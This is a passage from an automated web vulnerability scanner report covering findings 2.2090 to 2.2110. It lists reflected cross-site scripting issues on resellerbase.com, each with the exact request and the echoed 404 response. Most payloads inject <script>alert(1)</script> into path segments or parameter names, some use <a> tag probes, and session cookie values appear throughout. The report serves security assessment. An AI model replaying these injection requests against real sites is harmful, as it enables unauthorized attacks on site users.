
Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 699bb<script>alert(1)</script>3e492f82f3d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30699bb<script>alert(1)</script>3e492f82f3d/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30699bb<script>alert(1)</script>3e492f82f3d/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2091. http://www.resellerbase.com/detail/30/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload db05a<script>alert(1)</script>912d1e44827 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/search.phpdb05a<script>alert(1)</script>912d1e44827?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/search.phpdb05a<script>alert(1)</script>912d1e44827?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2092. http://www.resellerbase.com/detail/30/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/30/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 792ec<a>5c6145562aa was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/search.php?keyword=search...&Submit3=Search792ec<a>5c6145562aa&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/search.php?keyword=search...&Submit3=Search792ec<a>5c6145562aa&opt=2 was not found on this server.</p>
...[SNIP]...

2.2093. http://www.resellerbase.com/detail/30/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/30/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c4997<a>6084a4125db was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/search.php?keyword=search...c4997<a>6084a4125db&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/search.php?keyword=search...c4997<a>6084a4125db&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2094. http://www.resellerbase.com/detail/30/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 62881<script>alert(1)</script>b1a16e1082 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/search.php?keyword=search...&Submit3=Search&opt=2&62881<script>alert(1)</script>b1a16e1082=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/search.php?keyword=search...&Submit3=Search&opt=2&62881<script>alert(1)</script>b1a16e1082=1 was not found on this server.</p>
...[SNIP]...

2.2095. http://www.resellerbase.com/detail/30/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/30/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d93d0<a>a2ead3a44ab was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/30/search.php?keyword=search...&Submit3=Search&opt=2d93d0<a>a2ead3a44ab HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/search.php?keyword=search...&Submit3=Search&opt=2d93d0<a>a2ead3a44ab was not found on this server.</p>
...[SNIP]...

2.2096. http://www.resellerbase.com/detail/30/spacash-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/spacash-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b5094<script>alert(1)</script>217d2cdf23f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb5094<script>alert(1)</script>217d2cdf23f/30/spacash-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb5094<script>alert(1)</script>217d2cdf23f/30/spacash-com.html was not found on this server.</p>
...[SNIP]...

2.2097. http://www.resellerbase.com/detail/30/spacash-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/30/spacash-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 50887<a>a6e682eb0a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/3050887<a>a6e682eb0a1/spacash-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3050887<a>a6e682eb0a1/spacash-com.html was not found on this server.</p>
...[SNIP]...

2.2098. http://www.resellerbase.com/detail/30/spacash-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/spacash-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7eec3<script>alert(1)</script>9a03104327d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/7eec3<script>alert(1)</script>9a03104327d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/7eec3<script>alert(1)</script>9a03104327d was not found on this server.</p>
...[SNIP]...

2.2099. http://www.resellerbase.com/detail/30/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2244f<script>alert(1)</script>db7cc674102 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2244f<script>alert(1)</script>db7cc674102/30/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2244f<script>alert(1)</script>db7cc674102/30/themes/ was not found on this server.</p>
...[SNIP]...

2.2100. http://www.resellerbase.com/detail/30/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload abfd5<script>alert(1)</script>4d59e0af64d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30abfd5<script>alert(1)</script>4d59e0af64d/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30abfd5<script>alert(1)</script>4d59e0af64d/themes/ was not found on this server.</p>
...[SNIP]...

2.2101. http://www.resellerbase.com/detail/30/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8c265<script>alert(1)</script>c46688add0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes8c265<script>alert(1)</script>c46688add0/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes8c265<script>alert(1)</script>c46688add0/ was not found on this server.</p>
...[SNIP]...

2.2102. http://www.resellerbase.com/detail/30/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6cf1f<script>alert(1)</script>5ec738fabcc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/?6cf1f<script>alert(1)</script>5ec738fabcc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/?6cf1f<script>alert(1)</script>5ec738fabcc=1 was not found on this server.</p>
...[SNIP]...

2.2103. http://www.resellerbase.com/detail/30/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d29a0<script>alert(1)</script>9a38c2a0668 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild29a0<script>alert(1)</script>9a38c2a0668/30/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild29a0<script>alert(1)</script>9a38c2a0668/30/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2104. http://www.resellerbase.com/detail/30/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 81919<script>alert(1)</script>e38cedf5403 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3081919<script>alert(1)</script>e38cedf5403/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3081919<script>alert(1)</script>e38cedf5403/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2105. http://www.resellerbase.com/detail/30/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d1efe<script>alert(1)</script>9d7c091b790 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themesd1efe<script>alert(1)</script>9d7c091b790/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themesd1efe<script>alert(1)</script>9d7c091b790/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2106. http://www.resellerbase.com/detail/30/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7d122<script>alert(1)</script>6450a139f10 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos7d122<script>alert(1)</script>6450a139f10/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos7d122<script>alert(1)</script>6450a139f10/ was not found on this server.</p>
...[SNIP]...

2.2107. http://www.resellerbase.com/detail/30/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1f5c7<script>alert(1)</script>836a93682df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30/themes/kosmos/?1f5c7<script>alert(1)</script>836a93682df=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30/themes/kosmos/?1f5c7<script>alert(1)</script>836a93682df=1 was not found on this server.</p>
...[SNIP]...

2.2108. http://www.resellerbase.com/detail/30/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9144f<script>alert(1)</script>35ad17dd550 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9144f<script>alert(1)</script>35ad17dd550/30/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9144f<script>alert(1)</script>35ad17dd550/30/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2109. http://www.resellerbase.com/detail/30/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 356eb<script>alert(1)</script>41468c291 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/30356eb<script>alert(1)</script>41468c291/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/30356eb<script>alert(1)</script>41468c291/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2110. http://www.resellerbase.com/detail/30/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/30/themes/kosmos/images/

